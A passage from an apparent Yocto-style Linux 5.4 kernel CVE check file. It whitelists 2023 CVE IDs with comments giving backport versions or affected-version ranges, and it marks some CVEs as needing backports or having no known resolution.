7650# cpe-stable-backport: Backported in 5.4.242
7651CVE_CHECK_WHITELIST += "CVE-2023-2248"
7652
7653# cpe-stable-backport: Backported in 5.4.243
7654CVE_CHECK_WHITELIST += "CVE-2023-2269"
7655
7656# CVE-2023-22995 needs backporting (fixed from 5.17rc1)
7657
7658# fixed-version: only affects 5.16rc1 onwards
7659CVE_CHECK_WHITELIST += "CVE-2023-22996"
7660
7661# fixed-version: only affects 5.17rc1 onwards
7662CVE_CHECK_WHITELIST += "CVE-2023-22997"
7663
7664# fixed-version: only affects 5.7rc1 onwards
7665CVE_CHECK_WHITELIST += "CVE-2023-22998"
7666
7667# fixed-version: only affects 5.12rc1 onwards
7668CVE_CHECK_WHITELIST += "CVE-2023-22999"
7669
7670# CVE-2023-23000 needs backporting (fixed from 5.17rc1)
7671
7672# fixed-version: only affects 5.11rc1 onwards
7673CVE_CHECK_WHITELIST += "CVE-2023-23001"
7674
7675# fixed-version: only affects 5.7rc1 onwards
7676CVE_CHECK_WHITELIST += "CVE-2023-23002"
7677
7678# fixed-version: only affects 5.16rc1 onwards
7679CVE_CHECK_WHITELIST += "CVE-2023-23003"
7680
7681# CVE-2023-23004 needs backporting (fixed from 5.19rc1)
7682
7683# fixed-version: only affects 6.1rc1 onwards
7684CVE_CHECK_WHITELIST += "CVE-2023-23005"
7685
7686# cpe-stable-backport: Backported in 5.4.170
7687CVE_CHECK_WHITELIST += "CVE-2023-23006"
7688
7689# CVE-2023-23039 has no known resolution
7690
7691# cpe-stable-backport: Backported in 5.4.229
7692CVE_CHECK_WHITELIST += "CVE-2023-23454"
7693
7694# cpe-stable-backport: Backported in 5.4.229
7695CVE_CHECK_WHITELIST += "CVE-2023-23455"
7696
7697# cpe-stable-backport: Backported in 5.4.231
7698CVE_CHECK_WHITELIST += "CVE-2023-23559"
7699
7700# fixed-version: only affects 5.10rc1 onwards
7701CVE_CHECK_WHITELIST += "CVE-2023-23586"
7702
7703# fixed-version: only affects 5.18rc1 onwards
7704CVE_CHECK_WHITELIST += "CVE-2023-2430"
7705
7706# cpe-stable-backport: Backported in 5.4.240
7707CVE_CHECK_WHITELIST += "CVE-2023-2483"
7708
7709# fixed-version: only affects 5.6rc4 onwards
7710CVE_CHECK_WHITELIST += "CVE-2023-25012"
7711
7712# cpe-stable-backport: Backported in 5.4.242
7713CVE_CHECK_WHITELIST += "CVE-2023-2513"
7714
7715# fixed-version: only affects 5.14rc1 onwards
7716CVE_CHECK_WHITELIST += "CVE-2023-25775"
7717
7718# fixed-version: only affects 6.3rc1 onwards
7719CVE_CHECK_WHITELIST += "CVE-2023-2598"
7720
7721# CVE-2023-26242 has no known resolution
7722
7723# CVE-2023-2640 has no known resolution
7724
7725# fixed-version: only affects 5.15rc1 onwards
7726CVE_CHECK_WHITELIST += "CVE-2023-26544"
7727
7728# cpe-stable-backport: Backported in 5.4.232
7729CVE_CHECK_WHITELIST += "CVE-2023-26545"
7730
7731# fixed-version: only affects 6.1rc1 onwards
7732CVE_CHECK_WHITELIST += "CVE-2023-26605"
7733
7734# fixed-version: only affects 5.15rc1 onwards
7735CVE_CHECK_WHITELIST += "CVE-2023-26606"
7736
7737# cpe-stable-backport: Backported in 5.4.225
7738CVE_CHECK_WHITELIST += "CVE-2023-26607"
7739
7740# cpe-stable-backport: Backported in 5.4.227
7741CVE_CHECK_WHITELIST += "CVE-2023-28327"
7742
7743# cpe-stable-backport: Backported in 5.4.229
7744CVE_CHECK_WHITELIST += "CVE-2023-28328"
7745
7746# fixed-version: only affects 5.8rc1 onwards
7747CVE_CHECK_WHITELIST += "CVE-2023-28410"
7748
7749# fixed-version: only affects 6.3rc1 onwards
7750CVE_CHECK_WHITELIST += "CVE-2023-28464"
7751
7752# cpe-stable-backport: Backported in 5.4.240
7753CVE_CHECK_WHITELIST += "CVE-2023-28466"
7754
7755# cpe-stable-backport: Backported in 5.4.213
7756CVE_CHECK_WHITELIST += "CVE-2023-2860"
7757
7758# CVE-2023-28746 needs backporting (fixed from 6.9rc1)
7759
7760# cpe-stable-backport: Backported in 5.4.133
7761CVE_CHECK_WHITELIST += "CVE-2023-28772"
7762
7763# fixed-version: only affects 5.17rc1 onwards
7764CVE_CHECK_WHITELIST += "CVE-2023-28866"
7765
7766# fixed-version: only affects 5.8rc1 onwards
7767CVE_CHECK_WHITELIST += "CVE-2023-2898"
7768
7769# cpe-stable-backport: Backported in 5.4.235
7770CVE_CHECK_WHITELIST += "CVE-2023-2985"
7771
7772# cpe-stable-backport: Backported in 5.4.253
7773CVE_CHECK_WHITELIST += "CVE-2023-3006"
7774
7775# Skipping CVE-2023-3022, no affected_versions
7776
7777# cpe-stable-backport: Backported in 5.4.238
7778CVE_CHECK_WHITELIST += "CVE-2023-30456"
7779
7780# cpe-stable-backport: Backported in 5.4.240
7781CVE_CHECK_WHITELIST += "CVE-2023-30772"
7782
7783# cpe-stable-backport: Backported in 5.4.244
7784CVE_CHECK_WHITELIST += "CVE-2023-3090"
7785
7786# fixed-version: Fixed after version 4.8rc7
7787CVE_CHECK_WHITELIST += "CVE-2023-3106"
7788
7789# Skipping CVE-2023-3108, no affected_versions
7790
7791# CVE-2023-31081 has no known resolution
7792
7793# CVE-2023-31082 has no known resolution
7794
7795# CVE-2023-31083 needs backporting (fixed from 6.6rc1)
7796
7797# CVE-2023-31084 needs backporting (fixed from 6.4rc3)
7798
7799# cpe-stable-backport: Backported in 5.4.258
7800CVE_CHECK_WHITELIST += "CVE-2023-31085"
7801
7802# cpe-stable-backport: Backported in 5.4.247
7803CVE_CHECK_WHITELIST += "CVE-2023-3111"
7804
7805# cpe-stable-backport: Backported in 5.4.251
7806CVE_CHECK_WHITELIST += "CVE-2023-3117"
7807
7808# fixed-version: only affects 5.9rc1 onwards
7809CVE_CHECK_WHITELIST += "CVE-2023-31248"
7810
7811# cpe-stable-backport: Backported in 5.4.244
7812CVE_CHECK_WHITELIST += "CVE-2023-3141"
7813
7814# cpe-stable-backport: Backported in 5.4.242
7815CVE_CHECK_WHITELIST += "CVE-2023-31436"
7816
7817# cpe-stable-backport: Backported in 5.4.193
7818CVE_CHECK_WHITELIST += "CVE-2023-3159"
7819
7820# cpe-stable-backport: Backported in 5.4.232
7821CVE_CHECK_WHITELIST += "CVE-2023-3161"
7822
7823# cpe-stable-backport: Backported in 5.4.251
7824CVE_CHECK_WHITELIST += "CVE-2023-3212"
7825
7826# cpe-stable-backport: Backported in 5.4.235
7827CVE_CHECK_WHITELIST += "CVE-2023-3220"
7828
7829# cpe-stable-backport: Backported in 5.4.243
7830CVE_CHECK_WHITELIST += "CVE-2023-32233"
7831
7832# fixed-version: only affects 5.15rc1 onwards
7833CVE_CHECK_WHITELIST += "CVE-2023-32247"
7834
7835# fixed-version: only affects 5.15rc1 onwards
7836CVE_CHECK_WHITELIST += "CVE-2023-32248"
7837
7838# fixed-version: only affects 5.15rc1 onwards
7839CVE_CHECK_WHITELIST += "CVE-2023-32250"
7840
7841# fixed-version: only affects 5.15rc1 onwards
7842CVE_CHECK_WHITELIST += "CVE-2023-32252"
7843
7844# fixed-version: only affects 5.15rc1 onwards
7845CVE_CHECK_WHITELIST += "CVE-2023-32254"
7846
7847# fixed-version: only affects 5.15rc1 onwards
7848CVE_CHECK_WHITELIST += "CVE-2023-32257"
7849
7850# fixed-version: only affects 5.15rc1 onwards
7851CVE_CHECK_WHITELIST += "CVE-2023-32258"
7852
7853# cpe-stable-backport: Backported in 5.4.232
7854CVE_CHECK_WHITELIST += "CVE-2023-32269"
7855
7856# CVE-2023-32629 has no known resolution
7857
7858# cpe-stable-backport: Backported in 5.4.243
7859CVE_CHECK_WHITELIST += "CVE-2023-3268"
7860
7861# fixed-version: only affects 6.1rc1 onwards
7862CVE_CHECK_WHITELIST += "CVE-2023-3269"
7863
7864# fixed-version: only affects 6.2rc1 onwards
7865CVE_CHECK_WHITELIST += "CVE-2023-3312"
7866
7867# fixed-version: only affects 6.2rc1 onwards
7868CVE_CHECK_WHITELIST += "CVE-2023-3317"
7869
7870# cpe-stable-backport: Backported in 5.4.240
7871CVE_CHECK_WHITELIST += "CVE-2023-33203"
7872
7873# fixed-version: only affects 6.2rc1 onwards
7874CVE_CHECK_WHITELIST += "CVE-2023-33250"
7875
7876# CVE-2023-33288 needs backporting (fixed from 6.3rc4)
7877
7878# cpe-stable-backport: Backported in 5.4.248
7879CVE_CHECK_WHITELIST += "CVE-2023-3338"
7880
7881# fixed-version: only affects 5.11rc1 onwards
7882CVE_CHECK_WHITELIST += "CVE-2023-3355"
7883
7884# fixed-version: only affects 5.11rc1 onwards
7885CVE_CHECK_WHITELIST += "CVE-2023-3357"
7886
7887# cpe-stable-backport: Backported in 5.4.231
7888CVE_CHECK_WHITELIST += "CVE-2023-3358"
7889
7890# fixed-version: only affects 5.18rc1 onwards
7891CVE_CHECK_WHITELIST += "CVE-2023-3359"
7892
7893# CVE-2023-3389 needs backporting (fixed from 6.0rc1)
7894
7895# cpe-stable-backport: Backported in 5.4.251
7896CVE_CHECK_WHITELIST += "CVE-2023-3390"
7897
7898# fixed-version: only affects 5.17rc1 onwards
7899CVE_CHECK_WHITELIST += "CVE-2023-33951"
7900
7901# fixed-version: only affects 5.17rc1 onwards
7902CVE_CHECK_WHITELIST += "CVE-2023-33952"
7903
7904# CVE-2023-3397 has no known resolution
7905
7906# cpe-stable-backport: Backported in 5.4.249
7907CVE_CHECK_WHITELIST += "CVE-2023-34255"
7908
7909# cpe-stable-backport: Backported in 5.4.243
7910CVE_CHECK_WHITELIST += "CVE-2023-34256"
7911
7912# fixed-version: only affects 6.1 onwards
7913CVE_CHECK_WHITELIST += "CVE-2023-34319"
7914
7915# fixed-version: only affects 5.10rc1 onwards
7916CVE_CHECK_WHITELIST += "CVE-2023-34324"
7917
7918# fixed-version: only affects 5.15rc1 onwards
7919CVE_CHECK_WHITELIST += "CVE-2023-3439"
7920
7921# cpe-stable-backport: Backported in 5.4.251
7922CVE_CHECK_WHITELIST += "CVE-2023-35001"
7923
7924# cpe-stable-backport: Backported in 5.4.232
7925CVE_CHECK_WHITELIST += "CVE-2023-3567"
7926
7927# CVE-2023-35693 has no known resolution
7928
7929# cpe-stable-backport: Backported in 5.4.246
7930CVE_CHECK_WHITELIST += "CVE-2023-35788"
7931
7932# cpe-stable-backport: Backported in 5.4.243
7933CVE_CHECK_WHITELIST += "CVE-2023-35823"
7934
7935# cpe-stable-backport: Backported in 5.4.243
7936CVE_CHECK_WHITELIST += "CVE-2023-35824"
7937
7938# fixed-version: only affects 5.18rc1 onwards
7939CVE_CHECK_WHITELIST += "CVE-2023-35826"
7940
7941# cpe-stable-backport: Backported in 5.4.259
7942CVE_CHECK_WHITELIST += "CVE-2023-35827"
7943
7944# cpe-stable-backport: Backported in 5.4.243
7945CVE_CHECK_WHITELIST += "CVE-2023-35828"
7946
7947# fixed-version: only affects 5.8rc1 onwards
7948CVE_CHECK_WHITELIST += "CVE-2023-35829"
7949
7950# cpe-stable-backport: Backported in 5.4.248
7951CVE_CHECK_WHITELIST += "CVE-2023-3609"
7952
7953# fixed-version: only affects 5.9rc1 onwards
7954CVE_CHECK_WHITELIST += "CVE-2023-3610"
7955
7956# cpe-stable-backport: Backported in 5.4.253
7957CVE_CHECK_WHITELIST += "CVE-2023-3611"
7958
7959# CVE-2023-3640 has no known resolution
7960
7961# fixed-version: only affects 6.3rc1 onwards
7962CVE_CHECK_WHITELIST += "CVE-2023-37453"
7963
7964# CVE-2023-37454 has no known resolution
7965
7966# cpe-stable-backport: Backported in 5.4.255
7967CVE_CHECK_WHITELIST += "CVE-2023-3772"
7968
7969# fixed-version: only affects 5.17rc1 onwards
7970CVE_CHECK_WHITELIST += "CVE-2023-3773"
7971
7972# cpe-stable-backport: Backported in 5.4.251
7973CVE_CHECK_WHITELIST += "CVE-2023-3776"
7974
7975# fixed-version: only affects 5.9rc1 onwards
7976CVE_CHECK_WHITELIST += "CVE-2023-3777"
7977
7978# cpe-stable-backport: Backported in 5.4.224
7979CVE_CHECK_WHITELIST += "CVE-2023-3812"
7980
7981# fixed-version: only affects 5.19rc1 onwards
7982CVE_CHECK_WHITELIST += "CVE-2023-38409"
7983
7984# fixed-version: only affects 5.15rc1 onwards
7985CVE_CHECK_WHITELIST += "CVE-2023-38426"
7986
7987# fixed-version: only affects 5.15rc1 onwards
7988CVE_CHECK_WHITELIST += "CVE-2023-38427"
7989
7990# fixed-version: only affects 5.15rc1 onwards
7991CVE_CHECK_WHITELIST += "CVE-2023-38428"
7992
7993# fixed-version: only affects 5.15rc1 onwards
7994CVE_CHECK_WHITELIST += "CVE-2023-38429"
7995
7996# fixed-version: only affects 5.15rc1 onwards
7997CVE_CHECK_WHITELIST += "CVE-2023-38430"
7998
7999# fixed-version: only affects 5.15rc1 onwards
8000CVE_CHECK_WHITELIST += "CVE-2023-38431"
8001
8002# fixed-version: only affects 5.15rc1 onwards
8003CVE_CHECK_WHITELIST += "CVE-2023-38432"
8004
8005# cpe-stable-backport: Backported in 5.4.251
8006CVE_CHECK_WHITELIST += "CVE-2023-3863"
8007
8008# fixed-version: only affects 5.15rc1 onwards
8009CVE_CHECK_WHITELIST += "CVE-2023-3865"
8010
8011# fixed-version: only affects 5.15rc1 onwards
8012CVE_CHECK_WHITELIST += "CVE-2023-3866"
8013
8014# fixed-version: only affects 5.15rc1 onwards
8015CVE_CHECK_WHITELIST += "CVE-2023-3867"
8016
8017# cpe-stable-backport: Backported in 5.4.257
8018CVE_CHECK_WHITELIST += "CVE-2023-39189"
8019
8020# fixed-version: only affects 5.19rc1 onwards
8021CVE_CHECK_WHITELIST += "CVE-2023-39191"
8022
8023# cpe-stable-backport: Backported in 5.4.257
8024CVE_CHECK_WHITELIST += "CVE-2023-39192"
8025
8026# cpe-stable-backport: Backported in 5.4.257
8027CVE_CHECK_WHITELIST += "CVE-2023-39193"
8028
8029# cpe-stable-backport: Backported in 5.4.255
8030CVE_CHECK_WHITELIST += "CVE-2023-39194"
8031
8032# cpe-stable-backport: Backported in 5.4.251
8033CVE_CHECK_WHITELIST += "CVE-2023-39197"
8034
8035# CVE-2023-39198 needs backporting (fixed from 6.5rc7)
8036
8037# fixed-version: only affects 5.6rc1 onwards
8038CVE_CHECK_WHITELIST += "CVE-2023-4004"
8039
8040# CVE-2023-4010 has no known resolution
8041
8042# fixed-version: only affects 5.9rc1 onwards
8043CVE_CHECK_WHITELIST += "CVE-2023-4015"
8044
8045# cpe-stable-backport: Backported in 5.4.253
8046CVE_CHECK_WHITELIST += "CVE-2023-40283"
8047
8048# fixed-version: only affects 6.3rc1 onwards
8049CVE_CHECK_WHITELIST += "CVE-2023-40791"
8050
8051# cpe-stable-backport: Backported in 5.4.253
8052CVE_CHECK_WHITELIST += "CVE-2023-4128"
8053
8054# cpe-stable-backport: Backported in 5.4.251
8055CVE_CHECK_WHITELIST += "CVE-2023-4132"
8056
8057# CVE-2023-4133 needs backporting (fixed from 6.3)
8058
8059# CVE-2023-4134 needs backporting (fixed from 6.5rc1)
8060
8061# fixed-version: only affects 5.9rc1 onwards
8062CVE_CHECK_WHITELIST += "CVE-2023-4147"
8063
8064# fixed-version: only affects 5.11rc1 onwards
8065CVE_CHECK_WHITELIST += "CVE-2023-4155"
8066
8067# fixed-version: only affects 6.3rc1 onwards
8068CVE_CHECK_WHITELIST += "CVE-2023-4194"
8069
8070# cpe-stable-backport: Backported in 5.4.253
8071CVE_CHECK_WHITELIST += "CVE-2023-4206"
8072
8073# cpe-stable-backport: Backported in 5.4.253
8074CVE_CHECK_WHITELIST += "CVE-2023-4207"
8075
8076# cpe-stable-backport: Backported in 5.4.253
8077CVE_CHECK_WHITELIST += "CVE-2023-4208"
8078
8079# fixed-version: only affects 5.6rc1 onwards
8080CVE_CHECK_WHITELIST += "CVE-2023-4244"
8081
8082# fixed-version: only affects 5.7rc1 onwards
8083CVE_CHECK_WHITELIST += "CVE-2023-4273"
8084
8085# cpe-stable-backport: Backported in 5.4.257
8086CVE_CHECK_WHITELIST += "CVE-2023-42752"
8087
8088# cpe-stable-backport: Backported in 5.4.257
8089CVE_CHECK_WHITELIST += "CVE-2023-42753"
8090
8091# cpe-stable-backport: Backported in 5.4.258
8092CVE_CHECK_WHITELIST += "CVE-2023-42754"
8093
8094# cpe-stable-backport: Backported in 5.4.257
8095CVE_CHECK_WHITELIST += "CVE-2023-42755"
8096
8097# fixed-version: only affects 6.4rc6 onwards
8098CVE_CHECK_WHITELIST += "CVE-2023-42756"
8099
8100# cpe-stable-backport: Backported in 5.4.198
8101CVE_CHECK_WHITELIST += "CVE-2023-4385"
8102
8103# cpe-stable-backport: Backported in 5.4.196
8104CVE_CHECK_WHITELIST += "CVE-2023-4387"
8105
8106# fixed-version: only affects 5.7rc1 onwards
8107CVE_CHECK_WHITELIST += "CVE-2023-4389"
8108
8109# fixed-version: only affects 5.16rc1 onwards
8110CVE_CHECK_WHITELIST += "CVE-2023-4394"
8111
8112# fixed-version: only affects 5.11rc1 onwards
8113CVE_CHECK_WHITELIST += "CVE-2023-44466"
8114
8115# cpe-stable-backport: Backported in 5.4.196
8116CVE_CHECK_WHITELIST += "CVE-2023-4459"
8117
8118# fixed-version: only affects 5.6rc1 onwards
8119CVE_CHECK_WHITELIST += "CVE-2023-4563"
8120
8121# fixed-version: only affects 5.13rc1 onwards
8122CVE_CHECK_WHITELIST += "CVE-2023-4569"
8123
8124# cpe-stable-backport: Backported in 5.4.235
8125CVE_CHECK_WHITELIST += "CVE-2023-45862"
8126
8127# cpe-stable-backport: Backported in 5.4.260
8128CVE_CHECK_WHITELIST += "CVE-2023-45863"
8129
8130# cpe-stable-backport: Backported in 5.4.257
8131CVE_CHECK_WHITELIST += "CVE-2023-45871"
8132
8133# fixed-version: only affects 6.5rc1 onwards
8134CVE_CHECK_WHITELIST += "CVE-2023-45898"
8135
8136# fixed-version: only affects 6.4rc1 onwards
8137CVE_CHECK_WHITELIST += "CVE-2023-4610"
8138
8139# fixed-version: only affects 6.4rc1 onwards
8140CVE_CHECK_WHITELIST += "CVE-2023-4611"
8141
8142# CVE-2023-4622 needs backporting (fixed from 6.5rc1)
8143
8144# cpe-stable-backport: Backported in 5.4.257
8145CVE_CHECK_WHITELIST += "CVE-2023-4623"
8146
8147# cpe-stable-backport: Backported in 5.4.259
8148CVE_CHECK_WHITELIST += "CVE-2023-46343"
8149
8150# fixed-version: only affects 5.10rc1 onwards
8151CVE_CHECK_WHITELIST += "CVE-2023-46813"
8152
8153# cpe-stable-backport: Backported in 5.4.268
8154CVE_CHECK_WHITELIST += "CVE-2023-46838"
8155
8156# fixed-version: only affects 5.10rc1 onwards
8157CVE_CHECK_WHITELIST += "CVE-2023-46862"
8158
8159# CVE-2023-47233 needs backporting (fixed from 6.9rc1)
8160
8161# fixed-version: only affects 5.7rc1 onwards
8162CVE_CHECK_WHITELIST += "CVE-2023-4732"
8163
8164# CVE-2023-4881 needs backporting (fixed from 6.6rc1)
8165
8166# cpe-stable-backport: Backported in 5.4.257
8167CVE_CHECK_WHITELIST += "CVE-2023-4921"
8168
8169# CVE-2023-50431 needs backporting (fixed from 6.8rc1)
8170
8171# fixed-version: only affects 6.0rc1 onwards
8172CVE_CHECK_WHITELIST += "CVE-2023-5090"
8173
8174# cpe-stable-backport: Backported in 5.4.255
8175CVE_CHECK_WHITELIST += "CVE-2023-51042"
8176
8177# cpe-stable-backport: Backported in 5.4.251
8178CVE_CHECK_WHITELIST += "CVE-2023-51043"
8179
8180# fixed-version: only affects 5.13rc1 onwards
8181CVE_CHECK_WHITELIST += "CVE-2023-5158"
8182
8183# CVE-2023-51779 needs backporting (fixed from 6.7rc7)
8184
8185# cpe-stable-backport: Backported in 5.4.260
8186CVE_CHECK_WHITELIST += "CVE-2023-5178"
8187
8188# cpe-stable-backport: Backported in 5.4.265
8189CVE_CHECK_WHITELIST += "CVE-2023-51780"
8190
8191# cpe-stable-backport: Backported in 5.4.265
8192CVE_CHECK_WHITELIST += "CVE-2023-51781"
8193
8194# cpe-stable-backport: Backported in 5.4.265
8195CVE_CHECK_WHITELIST += "CVE-2023-51782"
8196
8197# fixed-version: only affects 5.9rc1 onwards
8198CVE_CHECK_WHITELIST += "CVE-2023-5197"
8199
8200# cpe-stable-backport: Backported in 5.4.267
8201CVE_CHECK_WHITELIST += "CVE-2023-52340"
8202
8203# CVE-2023-52429 needs backporting (fixed from 6.8rc3)
8204
8205# fixed-version: only affects 6.5rc6 onwards
8206CVE_CHECK_WHITELIST += "CVE-2023-52433"
8207
8208# CVE-2023-52434 needs backporting (fixed from 6.7rc6)
8209
8210# cpe-stable-backport: Backported in 5.4.269
8211CVE_CHECK_WHITELIST += "CVE-2023-52435"
8212
8213# cpe-stable-backport: Backported in 5.4.268
8214CVE_CHECK_WHITELIST += "CVE-2023-52436"
8215
8216# cpe-stable-backport: Backported in 5.4.268
8217CVE_CHECK_WHITELIST += "CVE-2023-52438"
8218
8219# cpe-stable-backport: Backported in 5.4.268
8220CVE_CHECK_WHITELIST += "CVE-2023-52439"
8221
8222# fixed-version: only affects 5.17rc4 onwards
8223CVE_CHECK_WHITELIST += "CVE-2023-52440"
8224
8225# fixed-version: only affects 5.15rc1 onwards
8226CVE_CHECK_WHITELIST += "CVE-2023-52441"
8227
8228# CVE-2023-52442 needs backporting (fixed from 6.5rc4)
8229
8230# cpe-stable-backport: Backported in 5.4.268
8231CVE_CHECK_WHITELIST += "CVE-2023-52443"
8232
8233# cpe-stable-backport: Backported in 5.4.268
8234CVE_CHECK_WHITELIST += "CVE-2023-52444"
8235
8236# cpe-stable-backport: Backported in 5.4.268
8237CVE_CHECK_WHITELIST += "CVE-2023-52445"
8238
8239# fixed-version: only affects 6.2rc1 onwards
8240CVE_CHECK_WHITELIST += "CVE-2023-52446"
8241
8242# fixed-version: only affects 5.9rc1 onwards
8243CVE_CHECK_WHITELIST += "CVE-2023-52447"
8244
8245# cpe-stable-backport: Backported in 5.4.268
8246CVE_CHECK_WHITELIST += "CVE-2023-52448"
8247
8248# cpe-stable-backport: Backported in 5.4.268
8249CVE_CHECK_WHITELIST += "CVE-2023-52449"
8250
8251# fixed-version: only affects 6.2rc1 onwards
8252CVE_CHECK_WHITELIST += "CVE-2023-52450"
8253
8254# cpe-stable-backport: Backported in 5.4.268
8255CVE_CHECK_WHITELIST += "CVE-2023-52451"
8256
8257# fixed-version: only affects 5.12rc1 onwards
8258CVE_CHECK_WHITELIST += "CVE-2023-52452"
8259
8260# fixed-version: only affects 6.2rc1 onwards
8261CVE_CHECK_WHITELIST += "CVE-2023-52453"
8262
8263# cpe-stable-backport: Backported in 5.4.268
8264CVE_CHECK_WHITELIST += "CVE-2023-52454"
8265
8266# fixed-version: only affects 6.3rc1 onwards
8267CVE_CHECK_WHITELIST += "CVE-2023-52455"
8268
8269# fixed-version: only affects 5.9rc1 onwards
8270CVE_CHECK_WHITELIST += "CVE-2023-52456"
8271
8272# fixed-version: only affects 6.1rc6 onwards
8273CVE_CHECK_WHITELIST += "CVE-2023-52457"
8274
8275# CVE-2023-52458 needs backporting (fixed from 6.8rc1)
8276
8277# fixed-version: only affects 6.6rc1 onwards
8278CVE_CHECK_WHITELIST += "CVE-2023-52459"
8279
8280# fixed-version: only affects 6.7rc1 onwards
8281CVE_CHECK_WHITELIST += "CVE-2023-52460"
8282
8283# fixed-version: only affects 6.7rc1 onwards
8284CVE_CHECK_WHITELIST += "CVE-2023-52461"
8285
8286# fixed-version: only affects 5.16rc1 onwards
8287CVE_CHECK_WHITELIST += "CVE-2023-52462"
8288
8289# fixed-version: only affects 5.8rc7 onwards
8290CVE_CHECK_WHITELIST += "CVE-2023-52463"
8291
8292# cpe-stable-backport: Backported in 5.4.268
8293CVE_CHECK_WHITELIST += "CVE-2023-52464"
8294
8295# fixed-version: only affects 6.5rc1 onwards
8296CVE_CHECK_WHITELIST += "CVE-2023-52465"
8297
8298# fixed-version: only affects 5.9rc1 onwards
8299CVE_CHECK_WHITELIST += "CVE-2023-52467"
8300
8301# fixed-version: only affects 6.4rc1 onwards
8302CVE_CHECK_WHITELIST += "CVE-2023-52468"
8303
8304# cpe-stable-backport: Backported in 5.4.268
8305CVE_CHECK_WHITELIST += "CVE-2023-52469"
8306
8307# cpe-stable-backport: Backported in 5.4.268
8308CVE_CHECK_WHITELIST += "CVE-2023-52470"
8309
8310# fixed-version: only affects 6.7rc1 onwards
8311CVE_CHECK_WHITELIST += "CVE-2023-52471"
8312
8313# fixed-version: only affects 6.5rc1 onwards
8314CVE_CHECK_WHITELIST += "CVE-2023-52472"
8315
8316# fixed-version: only affects 6.4rc1 onwards
8317CVE_CHECK_WHITELIST += "CVE-2023-52473"
8318
8319# CVE-2023-52474 needs backporting (fixed from 6.4rc1)
8320
8321# cpe-stable-backport: Backported in 5.4.259
8322CVE_CHECK_WHITELIST += "CVE-2023-52475"
8323
8324# CVE-2023-52476 needs backporting (fixed from 6.6rc6)
8325
8326# cpe-stable-backport: Backported in 5.4.259
8327CVE_CHECK_WHITELIST += "CVE-2023-52477"
8328
8329# cpe-stable-backport: Backported in 5.4.259
8330CVE_CHECK_WHITELIST += "CVE-2023-52478"
8331
8332# CVE-2023-52479 needs backporting (fixed from 6.6rc5)
8333
8334# CVE-2023-52480 needs backporting (fixed from 6.6rc5)
8335
8336# CVE-2023-52481 needs backporting (fixed from 6.6rc5)
8337
8338# CVE-2023-52482 needs backporting (fixed from 6.6rc4)
8339
8340# fixed-version: only affects 5.15rc1 onwards
8341CVE_CHECK_WHITELIST += "CVE-2023-52483"
8342
8343# CVE-2023-52484 needs backporting (fixed from 6.6rc5)
8344
8345# CVE-2023-52485 needs backporting (fixed from 6.8rc1)
8346
8347# cpe-stable-backport: Backported in 5.4.269
8348CVE_CHECK_WHITELIST += "CVE-2023-52486"
8349
8350# fixed-version: only affects 6.5rc1 onwards
8351CVE_CHECK_WHITELIST += "CVE-2023-52487"
8352
8353# CVE-2023-52488 needs backporting (fixed from 6.8rc1)
8354
8355# CVE-2023-52489 needs backporting (fixed from 6.8rc1)
8356
8357# fixed-version: only affects 6.3rc1 onwards
8358CVE_CHECK_WHITELIST += "CVE-2023-52490"
8359
8360# CVE-2023-52491 needs backporting (fixed from 6.8rc1)
8361
8362# fixed-version: only affects 5.6rc1 onwards
8363CVE_CHECK_WHITELIST += "CVE-2023-52492"
8364
8365# fixed-version: only affects 5.7rc1 onwards
8366CVE_CHECK_WHITELIST += "CVE-2023-52493"
8367
8368# fixed-version: only affects 5.13rc1 onwards
8369CVE_CHECK_WHITELIST += "CVE-2023-52494"
8370
8371# fixed-version: only affects 6.3rc1 onwards
8372CVE_CHECK_WHITELIST += "CVE-2023-52495"
8373
8374# CVE-2023-52497 needs backporting (fixed from 6.8rc1)
8375
8376# CVE-2023-52498 needs backporting (fixed from 6.8rc1)
8377
8378# fixed-version: only affects 5.12rc1 onwards
8379CVE_CHECK_WHITELIST += "CVE-2023-52499"
8380
8381# CVE-2023-52500 needs backporting (fixed from 6.6rc2)
8382
8383# CVE-2023-52501 needs backporting (fixed from 6.6rc2)
8384
8385# cpe-stable-backport: Backported in 5.4.259
8386CVE_CHECK_WHITELIST += "CVE-2023-52502"
8387
8388# fixed-version: only affects 5.6rc1 onwards
8389CVE_CHECK_WHITELIST += "CVE-2023-52503"
8390
8391# cpe-stable-backport: Backported in 5.4.270
8392CVE_CHECK_WHITELIST += "CVE-2023-52504"
8393
8394# fixed-version: only affects 5.18rc1 onwards
8395CVE_CHECK_WHITELIST += "CVE-2023-52505"
8396
8397# CVE-2023-52506 needs backporting (fixed from 6.6rc3)
8398
8399# cpe-stable-backport: Backported in 5.4.259
8400CVE_CHECK_WHITELIST += "CVE-2023-52507"
8401
8402# CVE-2023-52508 needs backporting (fixed from 6.6rc2)
8403
8404# cpe-stable-backport: Backported in 5.4.259
8405CVE_CHECK_WHITELIST += "CVE-2023-52509"
8406
8407# cpe-stable-backport: Backported in 5.4.259
8408CVE_CHECK_WHITELIST += "CVE-2023-52510"
8409
8410# CVE-2023-52511 needs backporting (fixed from 6.6rc1)
8411
8412# fixed-version: only affects 5.18rc1 onwards
8413CVE_CHECK_WHITELIST += "CVE-2023-52512"
8414
8415# cpe-stable-backport: Backported in 5.4.258
8416CVE_CHECK_WHITELIST += "CVE-2023-52513"
8417
8418# CVE-2023-52515 needs backporting (fixed from 6.6rc5)
8419
8420# CVE-2023-52516 needs backporting (fixed from 6.6rc1)
8421
8422# CVE-2023-52517 needs backporting (fixed from 6.6rc1)
8423
8424# fixed-version: only affects 5.16rc1 onwards
8425CVE_CHECK_WHITELIST += "CVE-2023-52518"
8426
8427# CVE-2023-52519 needs backporting (fixed from 6.6rc5)
8428
8429# fixed-version: only affects 5.14rc1 onwards
8430CVE_CHECK_WHITELIST += "CVE-2023-52520"
8431
8432# cpe-stable-backport: Backported in 5.4.258
8433CVE_CHECK_WHITELIST += "CVE-2023-52522"
8434
8435# fixed-version: only affects 5.13rc1 onwards
8436CVE_CHECK_WHITELIST += "CVE-2023-52523"
8437
8438# fixed-version: only affects 6.5rc1 onwards
8439CVE_CHECK_WHITELIST += "CVE-2023-52524"
8440
8441# fixed-version: only affects 6.6rc1 onwards
8442CVE_CHECK_WHITELIST += "CVE-2023-52525"
8443
8444# fixed-version: only affects 6.1rc1 onwards
8445CVE_CHECK_WHITELIST += "CVE-2023-52526"
8446
8447# cpe-stable-backport: Backported in 5.4.258
8448CVE_CHECK_WHITELIST += "CVE-2023-52527"
8449
8450# cpe-stable-backport: Backported in 5.4.258
8451CVE_CHECK_WHITELIST += "CVE-2023-52528"
8452
8453# fixed-version: only affects 5.14rc1 onwards
8454CVE_CHECK_WHITELIST += "CVE-2023-52529"
8455
